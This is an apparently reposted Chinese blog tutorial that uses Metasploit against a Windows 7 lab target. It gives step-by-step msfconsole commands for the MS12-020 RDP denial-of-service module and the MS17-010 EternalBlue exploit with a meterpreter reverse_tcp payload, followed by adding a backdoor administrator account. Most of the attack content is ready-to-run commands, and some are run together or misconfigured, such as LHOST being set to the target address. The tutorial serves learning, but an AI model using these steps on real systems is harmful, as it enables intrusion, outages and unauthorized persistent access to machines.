ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

msfconsole利用ms17-010和ms12-020攻击

2021-04-30 09:34:55  阅读:244  来源: 互联网

标签:set msfconsole show 端口 010 ms12 020 options


MS12-020

msfconsole 从终端进入msf框架

msfconsole

image-20210429232434694

查找漏洞 search 12_020

search 12_020 

image-20210429232504111

使用该漏洞利用代码

 use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

image-20210429233413974

查看使用方法

 show options 

image-20210429233426606

查看靶机的ip地址

ipconfig

image-20210429233806813

查看靶机开放端口

netstat -ano

image-20210429235403692

开发3389端口

image-20210429235804953

image-20210429235947192

image-20210430000041630

image-20210430000114648

image-20210430000132952

image-20210430000142823image-20210430000221280

image-20210430001107406

image-20210430001142350

image-20210430001638674

设置参数

 set RHOST 192.168.74.134 
 set RPORT 3389 

image-20210429233952245

查看

show options

image-20210429234046172

攻击

exploit 

image-20210430001750923

image-20210430001944853

MS17-010

msfconsole 从终端进入msf框架

msfconsole

image-20210430002110301

查找MS17-010相关利用代码

search 17_010 

image-20210430002257581

检测内网中存在漏洞的主机系统

use auxiliary/scanner/smb/smb_ms17_010 show options  

image-20210430002355666

image-20210430002429892

查看445端口是否开放

image-20210430002956797

设置参数

set RHOST 192.168.74.134/24show options  

image-20210430002738779

run 出现加号可入侵

run

image-20210430004134286

使用模块进行入侵

search ms17_010

image-20210430004152722

调用永恒之蓝攻击模块

use exploit/windows/smb/ms17_010_eternalblue show options  

image-20210430004213005

设置参数

 set RHOST 192.168.74.134 set payload windows/x64/meterpreter/reverse_tcp payload set LHOST 192.168.74.134 show options

image-20210430004230669

攻击

 run

image-20210430004412043

创建一个ammin用户

net user admin 123456 /add

image-20210430004437433

到靶机查看

net user

image-20210430004521099

参考资料

[win7旗舰版怎么开启3389端口?](win7旗舰版怎么开启3389端口?_百度知道 (baidu.com))

[win7怎么打开端口](win7怎么打开端口-百度经验 (baidu.com))

[Metasploit(MSF)快速使用MS12-020、MS17-010(永恒之蓝)漏洞](Metasploit(MSF)快速使用MS12-020、MS17-010(永恒之蓝)漏洞 - 哔哩哔哩专栏 (bilibili.com))

[关于使用msf渗透攻击Win7主机并远程执行命令的复习]((1条消息) 关于使用msf渗透攻击Win7主机并远程执行命令的复习_LIKEQC的博客-CSDN博客_msf攻击win7)

标签:set,msfconsole,show,端口,010,ms12,020,options
来源: https://www.cnblogs.com/Lin1031/p/14720382.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有